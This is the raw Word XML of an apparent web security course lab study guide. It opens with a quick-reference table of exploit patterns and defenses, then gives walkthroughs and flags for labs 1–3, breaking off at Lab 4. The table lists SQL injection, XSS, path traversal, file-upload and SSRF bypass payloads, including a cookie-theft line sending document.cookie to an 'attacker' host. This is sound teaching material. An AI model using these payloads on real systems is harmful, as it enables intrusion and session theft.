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26CS6003 – Web Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Lab Study Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="600" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Labs 1–12 | Problem Statements, Exploits &amp; Defenses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Labs Covered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 1 · Firefox Developer Tools (Network &amp; Storage Tabs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 2 · ZAP – Scanning, Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 3 · Information Disclosure (Comments, Errors, Backup Files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 4 · Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 5 · File Upload &amp; Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 6 · Directory / Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 7 · Broken Authentication (Brute Force, 2FA, Reset)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 8 · Broken Access Control (IDOR, Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 9 · SQL Injection (Auth Bypass, UNION, Blind)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 10 · Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 11 · Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 12 · CORS Misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2C3E50" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">QUICK REFERENCE: Vulnerability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Exploit Pattern</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Defense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SQLi Auth Bypass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admin'-- -</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Parameterized queries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SQLi UNION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 UNION SELECT col1,col2,... FROM table -- </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Parameterized queries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Blind SQLi</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 and (boolean condition) -- abc</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Parameterized queries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Reflected XSS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&lt;script&gt;alert(1)&lt;/script&gt; in URL param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HTML-encode output; CSP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Stored XSS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&lt;script&gt; in form/comment field</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HTML-encode on render; CSP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XSS Cookie Theft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fetch('attacker'+document.cookie)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HttpOnly cookie flag; CSP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XSS Blacklist Bypass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&lt;scriscriptpt&gt; / nested tags</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Allowlist sanitization; CSP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CSRF No Token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Auto-submit form from attacker site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SameSite=Strict; CSRF tokens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CSRF Token Bypass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Reuse own token if not session-tied</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Bind token to user session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Path Traversal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../../etc/passwd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realpath() + prefix check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Path Traversal Bypass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..%2F..%2F / %00 null byte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Decode before sanitizing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File Upload RCE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Upload .php shell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Allowlist extensions; store outside webroot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Upload Bypass (BL)</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.htaccess trick / .php7</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Allowlist not denylist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Upload Bypass (WL)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GIF87a + PHP code + .php%00.gif</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Re-process images server-side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SSRF Basic</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Change URL param to internal host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URL allowlist; block RFC-1918 IPs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SSRF Blacklist Bypass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127.1, decimal IP, URL encoding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Proper URL parser + allowlist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SSRF Whitelist Bypass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victim.com#internal-url</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Parse URL, strip fragment first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IDOR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Change user ID in URL/param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Server-side ownership check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Vertical PrivEsc</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Guess admin URL; modify role cookie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Server-side role check (not cookie)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Broken 2FA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OTP not tied to user session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Bind OTP to session at generation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Broken Reset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Reuse reset token for another user</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Tie token to specific username+session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IP Block Bypass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X-Forwarded-For: 10.0.0.X</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Rate limit at network layer; ignore XFF</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CORS Origin Reflect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fetch() with credentials from any origin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Explicit origin allowlist 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276"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CORS + XSS Chain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XSS on trusted subdomain exfils CORS data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8449"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fix XSS; no wildcard subdomain CORS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5276"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Info Disclosure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C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Check comments, /robots.txt, backup dirs</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E8449"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Strip comments; secure backups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 1: Firefox Developer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Reconnaissance &amp; Browser Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Network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to inspect HTTP requests using Firefox Network Tab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leakage via observable HTTP traffic</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Used Network tab (F12) to observe all requests made during page load. Identified failed endpoints, status codes, and resent requests with modified headers.</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Resent 'failed-endpoint' request with custom headers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  User-Agent: Secret Agent 007</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  X-Secret: Bond007</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">login_http_nos: 3 (HTTP requests on login page load)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">failed_endpoint: /secret_endpoint/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">failed_status_code: 404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">logout_status_code: 302 (redirect after logout)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FLAG{BOND'S_WELCOME_GIFT!}</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expose sensitive endpoints. Use proper authentication on all routes.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Storage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to inspect cookies and localStorage using Firefox Storage Tab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Flags hidden in client-side storage; insecure cookies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Used Storage Tab to inspect cookies. Cleared cookies to observe login behavior. Found flag in cookie value. Created a custom cookie with key 'secret-cookie' and value 'getflag' to get second flag.</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Set cookie: secret-cookie=getflag via storage inspector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">first_cookie: csrftoken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">status_code (login without cookie): 403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sessionid SameSite: Lax</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FLAG{YOU_GOT_IN_LOCAL_STORAGE_!}</w:t>
      </w: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FLAG{SETTING_NEW_COOKIES_CAN_HELP_TOO_!}</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store sensitive data in client-side storage. Set proper cookie attributes (HttpOnly, Secure, SameSite=Strict).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="5B2C6F" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B2C6F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 2: ZAP (OWASP)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5B2C6F"/>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Application Scanning &amp; Fuzzing Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Introduction to ZAP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ZAP with FoxyProxy to intercept browser traffic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 Tool setup exercise</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Configured FoxyProxy to route browser traffic through ZAP proxy at localhost:30004. Verified traffic capture by browsing the target app.</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N/A</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Defenders should use WAFs; ZAP helps testers find issues before attackers do.</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Scanning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ZAP to perform vulnerability scans (authenticated and unauthenticated)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OWASP Top 10 issues detectable via automated scan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Ran ZAP automated scan against target app (port 30000 = no auth, port 30001 = with auth). Used Laksh:SecretPwd! credentials for authenticated scan. Generated HTML reports.</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ZAP automated scan with authentication configured</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Regular automated scanning should be part of CI/CD pipeline.</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Fuzzing via ZAP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ZAP fuzzer to discover hidden pages via a URL parameter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pages accessible via guessable parameter values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Target used ?page=X parameter for navigation. Used ZAP fuzzer with a provided wordlist to fuzz the 'page' parameter. Response differences (size/code) revealed the hidden page containing a flag.</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ZAP Fuzzer: fuzz ?page= parameter with wordlist</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rely on obscurity. Implement proper access control on all pages regardless of how they are navigated to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7D6608" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7D6608"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 3: Information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D6608"/>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Disclosure (Comments, Errors, Backup Files)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Information Disclosure via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flags hidden in HTML/CSS/JS source comments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data left in source code comments by developers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Used Firefox DevTools (Inspector, Style Editor, Debugger). Searched through HTML source, CSS, JavaScript files, and robots.txt for FLAG{...} patterns. Found 5 flags across various files.</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View Source / DevTools search across all source files + robots.txt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FLAG{1n4mat1on_D1sclosure_lj5v3rTF}</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Strip all comments from production code. Use build tools (minifiers) that remove comments automatically. Never put secrets in frontend code.</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Information Disclosure via Error/Debug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error conditions to expose debug information containing flags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mode enabled in production; verbose error messages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Deliberately induced errors by sending malformed/unexpected inputs to various endpoints. Debug stack traces revealed 2 flags directly. Third flag obtained by extracting admin credentials from debug output and logging in as admin.</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Trigger errors on relevant endpoints; read debug stack traces</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Disable debug mode in production. Use generic error messages. Log errors server-side only.</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Information Disclosure via Backup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admin password stored in an accessible backup directory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files left accessible on web server</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Found list of possible backup directories (via robots.txt or similar). Used ZAP fuzzer to enumerate which directories were accessible (different HTTP response codes). Browsed accessible backup folder and found file containing admin password. Logged in as admin to get flag.</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ZAP fuzzing backup directory paths; browse /backup/ files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup dirs discovered via robots.txt / ZAP fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin password found in a .bak or similar file in backup directory</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FLAG{1n4mat1on_D1sclosure_lj5v3rTF}</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store backups in web-accessible directories. Add backup paths to .gitignore. Restrict directory listing on web servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="78281F" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="78281F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 4: SSRF (Server-Side Request Forgery)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8281F"/>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SSRF – Basic, Blacklist Bypass, Whitelist Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
